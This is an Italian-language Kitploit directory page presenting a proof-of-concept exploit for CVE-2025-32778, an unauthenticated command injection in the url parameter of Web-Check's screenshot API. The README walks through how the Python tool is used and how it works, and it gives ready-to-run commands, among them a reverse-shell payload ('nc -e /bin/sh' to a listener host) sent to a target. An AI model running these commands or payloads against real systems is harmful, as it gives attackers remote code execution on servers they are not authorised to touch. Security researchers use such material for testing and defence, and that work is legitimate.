Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-32778 — Exploit PoC per CVE-2025-32778: command injection nello strumento OSINT Web-Check | Kitploit
Strumenti/GitHubGitHub/00xcanelo/cve-2025-32778
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHub00xcanelo/cve-2025-32778

CVE-2025-32778

Exploit PoC per CVE-2025-32778: command injection nello strumento OSINT Web-Check

Vedi Repository
31571 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-32778 - Exploit di Iniezione di Comandi in Web-Check

Critical Language: Python

Descrizione

CVE-2025-32778 è una vulnerabilità critica di iniezione di comandi nello strumento OSINT Web-Check di Lissy93.
Consente a un aggressore non autenticato di eseguire comandi di sistema arbitrari tramite il parametro url nell'API degli screenshot.

Questo script Python automatizza lo sfruttamento e può generare reverse shell o accettare payload shell personalizzati.


Avvertenza

  • Testa solo su sistemi di tua proprietà o per cui sei autorizzato.
  • L'uso non autorizzato è illegale e non etico.

Caratteristiche

  • Sfrutta l'iniezione di comandi url in Web-Check.
  • Supporta:
    • Reverse shell con --lhost e --lport.
    • Shell personalizzata tramite --shell.
  • Normalizzazione dell'URL.
  • Impedisce la combinazione di --shell con --lhost/--lport.

Requisiti

  • Python 3.x
  • Libreria Requests:
pip install requests

Utilizzo

git clone https://github.com/00xCanelo/CVE-2025-32778
cd CVE-2025-32778

Crea una reverse shell con lo strumento

python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444

Payload shell personalizzato (grezzo)

python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"

Menu di aiuto

python3 cve-2025-32778.py -h

Come Funziona

  1. Normalizza l'URL target in scheme://host[:port].

  2. Prepara il payload:

    • Genera una reverse shell usando --lhost e --lport.
    • Oppure usa un comando shell grezzo con --shell.
  3. Codifica il payload della shell per un'iniezione URL sicura.

  4. Invia una richiesta HTTP GET a /api/screenshot/ con il payload.

  5. Attendi la connessione della reverse shell.


🧑‍💻 Autore

00xCanelo
Profilo GitHub


Riferimenti

  • Repository GitHub di Web-Check – Progetto originale contenente il codice vulnerabile.
  • CVE-2025-32778 – Voce CVE che descrive la vulnerabilità di iniezione di comandi.
Scarica lo strumento